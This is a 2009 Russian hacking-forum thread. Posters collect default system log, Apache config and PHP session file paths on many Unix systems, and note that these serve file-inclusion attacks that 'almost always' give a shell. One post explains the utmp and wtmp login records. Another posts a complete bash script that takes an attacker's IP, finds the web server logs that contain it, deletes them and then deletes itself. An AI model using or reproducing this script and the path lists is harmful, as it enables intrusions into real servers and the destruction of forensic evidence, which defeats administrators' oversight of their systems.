Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
18.05.2009, 18:12
|
|
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме:
2185909
Репутация:
308
|
|
Сори, хотел исправить пост, а нажал делит) Выкладываю еще раз.
IRIX:
Код:
/var/adm/SYSLOG
/var/adm/sulog
/var/adm/utmp
/var/adm/utmpx
/var/adm/wtmp
/var/adm/wtmpx
/var/adm/lastlog/username
/usr/spool/lp/log
/var/adm/lp/lpd-errs
/usr/lib/cron/log
/var/adm/loginlog
/var/adm/pacct
/var/adm/dtmp
/var/adm/acct/sum/loginlog
/var/adm/X0msgs
/var/adm/crash/vmcore
/var/adm/crash/unix
AIX:
Код:
/var/adm/pacct
/var/adm/wtmp
/var/adm/dtmp
/var/adm/qacct
/var/adm/sulog
/var/adm/ras/errlog
/var/adm/ras/bootlog
/var/adm/cron/log
/etc/utmp
/etc/security/lastlog
/etc/security/failedlogin
/usr/spool/mqueue/syslog
SunOS:
Код:
/var/adm/messages
/var/adm/aculogs
/var/adm/aculog
/var/adm/sulog
/var/adm/vold.log
/var/adm/wtmp
/var/adm/wtmpx
/var/adm/utmp
/var/adm/utmpx
/var/adm/log/asppp.log
/var/log/syslog
/var/log/POPlog
/var/log/authlog
/var/adm/pacct
/var/lp/logs/lpsched
/var/lp/logs/lpNet
/var/lp/logs/requests
/var/cron/log
/var/saf/_log
/var/saf/port/log
Linux:
Код:
/var/log/lastlog
/var/log/telnetd
/var/run/utmp
/var/log/secure
/root/.ksh_history
/root/.bash_history
/root/.bash_logut
/var/log/wtmp
/etc/wtmp
/var/run/utmp
/etc/utmp
/var/log
/var/adm
/var/apache/log
/var/apache/logs
/usr/local/apache/log
/usr/local/apache/logs
/var/log/acct
/var/log/xferlog
/var/log/messages
/var/log/proftpd/xferlog.legacy
/var/log/proftpd.access_log
/var/log/proftpd.xferlog
/var/log/httpd/error_log
/var/log/httpd/access_log
/etc/httpd/logs/access_log
/etc/httpd/logs/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/httpsd/ssl.access_log
/etc/mail/access
/var/log/qmail
/var/log/smtpd
/var/log/samba
/var/log/samba-log.%m
/var/lock/samba
/root/.Xauthority
/var/log/poplog
/var/log/news.all
/var/log/spooler
/var/log/news
/var/log/news/news
/var/log/news/news.all
/var/log/news/news.crit
/var/log/news/news.err
/var/log/news/news.notice
/var/log/news/suck.err
/var/log/news/suck.notice
/var/spool/tmp
/var/spool/errors
/var/spool/logs
/var/spool/locks
/usr/local/www/logs/thttpd_log
/var/log/thttpd_log
/var/log/ncftpd/misclog.txt
/var/log/ncftpd.errs
/var/log/auth
Red Hat, Mac OS X
Код:
/var/log/httpd/access_log
/var/log/httpd/error_log
Solaris
Код:
/var/apache/logs/access_log
/var/apache/logs/error_log
SuSE Linux Enterprise Server
Код:
/var/log/httpd/access_log
/var/log/httpd/error_log
Lampp
Код:
/opt/lampp/logs/error_log
/opt/lampp/logs/access_log
Debian
Код:
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache-ssl/error.log
/var/log/apache-ssl/access.log
FreeBSD
Код:
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
OpenBSD
Код:
/var/www/log/access_log
/var/www/log/error_log
|
|
|
18.05.2009, 20:51
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
5 копеек..
/usr/local/apache2.2/
/usr/local/apache2.2/logs/access_log
/usr/local/apache2.2/logs/error_log
|
|
|
|
20.05.2009, 21:48
|
|
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме:
2185909
Репутация:
308
|
|
Kак пишутся логины в систему
Есть основные места, в которых сохраняется системная информация о логине:
/usr/etc/wtmp
/usr/etc/lastlog
/etc/utmp
utmp пишет инфу о том, кто в настоящее время использует систему.
Файл - последовательность входов со следующей структурой, которая конфигурится в /usr/include/utmp.h
Код:
struct utmp {
char ut_line[8]; /* tty name */
char ut_name[8]; /* user id */
char ut_host[16]; /* host name, if remote */
long ut_time; /* time on */
}
Эта структура пишет название терминалки юзера, юзер ID-ентификатор логиняшегося,имя хоста откель логинился, если не локально и время входа в систему. на многих платформах структура разная, но все равно легко достаточно читается.
wtmp пишет все входа и выходы из системы. Пустое имя пользователя указывает выход из системы на связанном терминале.
Кроме того, '~' указывает, что система была перезагружена в указанное время; вход с именами включающими'|'
говорит, что система изменила время как раз перед логоном и с именами и '{' после того как был совершен логон (то есть ,
команда даты изменила время системы.
Wtmp обслуживается login(1) и init (8). Они свои события по идее не пишут никуда, так что если их отрубить, то и логи
в wtmp писаться не будут. Wtmp используется вместе с командой/usr/ucb/last. Это понятно? Запросто проверить если
служба не работает.
/usr/adm/lastlog используется login(1) для того, чтобы сохранить предыдущие даты входа в систему, время, в которое они
были, и с какого хоста подключались. Структура для lastlog такая:
Код:
struct lastlog {
time_t ll_time;
char ll_line[8];
char ll_host[16];
};
|
|
|
|
27.05.2009, 07:27
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817
Репутация:
1503
|
|
FreeBSD 7.1-RELEASE 2009 i386
/var/log/httpd-error.log
/var/log/httpd-access.log
__________________
You may say I'm a dreamer
But I'm not the only one
|
|
|
|
16.06.2009, 00:37
|
|
Познающий
Регистрация: 16.05.2009
Сообщений: 42
Провел на форуме:
190310
Репутация:
7
|
|
архив в первом посте битый (auto_includer.zip (3.6 Кбайт, 146 просмотров)). Есть у кого нибудь?
|
|
|
|
18.06.2009, 22:52
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Код:
/usr/local/etc/apache2/vhosts.conf
/usr/local/apache/conf/vhosts.conf
/usr/local/apache2/conf/vhosts.conf
/usr/local/apache/conf/vhosts-custom.conf
/usr/local/apache2/conf/vhosts-custom.conf
прим. BlackSun: пути в данном случае должны начинаться со слешей, без них это относительные пути.
там всегда полный и правильный Document Root + часто полный адрес ERROR логов
Ну и моё любимое чото тут не наблюдал вроде:
если нашли такое - в 99% случаев сразу шелл
прим. BlackSun: ты хоть ветку почитай полностью .. https://forum.antichat.ru/showpost.php?p=1088072&postcount=11
Последний раз редактировалось BlackSun; 19.06.2009 в 08:43..
|
|
|
|
02.07.2009, 04:13
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
sess_ location
/tmp/
/php_sess/
/tmp/phpsess/
/tmp/php/
/tmp/php-sess/
/home/%username%/tmp/
/var/phptemp/
/var/phptmp/
/var/phpsess/
/var/php-sess/
/var/lib/php/
/var/lib/php/session/
/var/lib/php3
/var/lib/php3/session/
/var/lib/php4/
/var/lib/php4/session/
/var/lib/php5/
/var/lib/php5/session/
/var/lib/php6/
/var/lib/php6/session/
/www/phpsession/
C:\Temp
C:\WINDOWS\Temp
C:\PHP\sessiondata
.htaccess
php_value "session.save_path" "/path"
phpinfo()
session.save_handler files
session.save_path /path
Самый лучший вариант это поиск пшпинфо на сайте, т.к в нём вы увидим мастер валью, т.е то что прописано в php.ini и локал валью, то что прописано (если прописано) в .htaccess'e
Второй вариант поиск пшп.ини и .htaccess'ов
Ну и конечно можно просто искать саму папку с сессиями
Последний раз редактировалось Spyder; 05.07.2009 в 01:36..
|
|
|
|
22.07.2009, 03:34
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Только что так заюзал:
Код:
/etc/apache/default-server.conf
/etc/apache2/default-server.conf
может содержать DocumentRoot |
|
|
|
25.07.2009, 01:38
|
|
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме:
2185909
Репутация:
308
|
|
Cкрипт, который находит и удаляет лог файлы
Код:
#!/usr/local/bin/bash
### coded by t4z3v4r3d
### recurse function : i m not sure who has write that .So thanks unknown man
### made for FreeBSD First ....
if [ "`id -u`" != "0" ];then
echo "$0 cant run as $USER Please Give me the root perms!!!!! "
exit 1
fi
patern=$2
fl=/tmp/f.txt
fd=/tmp/find.txt
length=/tmp/l-f.txt
log_f=/tmp/log_f.txt
log_final=/tmp/final_log.txt
null=/dev/null
log_path=/tmp/log_Found_.txt
tm="`date | cut -d ":" -f 1`"
os=$OSTYPE
# you can add all paths for all os type !M$ windows IS NOT OS ....Exactly!
case $os in
Linux*) path=/etc/
;;
linux*) path=/etc/
;;
freebsd*) path=/usr/local/
;;
*) path=/
;;
esac
rm $fl
touch $fl
rm $fd
touch $fd
rm $log_f
touch $log_f
rm $log_final
touch $log_final
rm $log_path
touch $log_path
clear
echo "Enter attacker IP"
read -e ip
if [ "`find $path -name apache >> $fl`" ];then
echo -e "\033[3;2f Main path Found ....\033[0;0m"
else
if [ "`find $path -name apache2 >> $fl`" ];then
echo "Founded Apache2 Config files"
fi
fi
recurse () {
for file in $(/bin/ls $1)
do fqfn=$1/$file
[[ -d $fqfn ]] && recurse $fqfn
[[ ${#file} -gt $len ]] && { len=${#file} name=$fqfn; }
[[ -f $fqfn ]] && recurse $fqfn
[[ ${#file} -gt $len ]] && { len=${#file} name=$fqfn; }
#########################################################
if [ -f $1 ];then
let "f=f+1"
if [ "`ls $1 | grep -F .conf`" ];then
let "t=t+1"
cat $1 | grep -F .log | grep -v "#" | cut -d " " -f 2 >> $log_path
nom[$t]="`cat $1 | grep -F .log | grep -v "#" | wc -l`"
echo -e "reading $1\n `cat $1 | grep -F .log | grep -v "#"`" >> /tmp/r.txt
let "nt=nt+${nom[$t]}"
let "j=$nt+$t"
fi
fi
################################################################################
### MOnitoring all acts
################################################################################
echo -e "\033[3;1f\033[1;39m+\033[1;37m======================================\033[1;39m+\033[0;0m"
echo -e "\033[1;39m|\033[1;31m Scanned Files :\033[4;25f \033[1;37m$f\033[1;39m\033[4;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;31m Path(s) found :\033[5;25f \033[1;37m$l\033[1;39m\033[5;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;31m pattern found :\033[6;25f \033[1;37m$t\033[1;39m\033[6;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;31m pattern total :\033[7;25f \033[1;37m$j\033[1;39m\033[7;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;30m\033[8;2f Scanning `dirname ${1}`::: \033[1;39m\033[8;40f|\033[0;0m"
echo -e "\033[9;1f\033[1;39m+\033[1;37m======================================\033[1;39m+\033[0;0m"
##############################################################################
done ; }
reader(){
cat $fl | while read line ;do
if [ "`ls $line | grep .conf`" != "" ];then
recurse $line
fi
let "l=l+1"
done
}
reader
log_path_reader(){
cat $log_path | while read line ;do
if [ -f $line ];then
if [ "`cat $line | grep "$ip"`" != "" ];then
echo -en "\033[1;30mFounded[\033[1;31m"`cat $line | grep -c "$ip"`" \033[1;30m] $ip in "
echo -n "Removing $line"
rm $line
if [ ! -f $line ];then
echo -e "\033[1;39m ... Done !\033[0;0m"
else
echo -e "\033[1;31m ...Failed!\033[1;0m"
fi
fi
else
echo -e "\033[1;30mFile [\033[1;31m"$line " \033[1;39mFile Dose not exist......\033[1;30m]"
fi
let "l2=l2+1"
done
}
echo -e "\033[8;3f\033[1;31mpath= $path OS= $os\033[0;0m"
echo -e "\033[11;1f\033[1;30mScanning DONE!! NOW : Removing Log Files \033[0;0m"
log_path_reader
echo -en "\033[1;30mRemoving $0 "
rm $fl $log_path $0
if [ ! -f $0 ];then
echo -e "\033[1;39m ... Done !\033[0;0m"
else
echo -e "\033[1;31m ...Failed!\033[1;0m"
fi
echo -e "\033[1;37m Mail: amiri@abysssec.com\033[0;0m"
|
|
|
|
25.07.2009, 21:47
|
|
Новичок
Регистрация: 06.02.2009
Сообщений: 11
Провел на форуме:
62996
Репутация:
16
|
|
Пути логов по умолчанию у apache для разных ОС:
hxxp://wiki.apache.org/httpd/DistrosDefaultLayout
|
|
|
|
|
|
|
TEST QR: []
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [underwater]](/avatars/avatar81148.gif){kind=avatar}
Похожие темы
Линейный вид
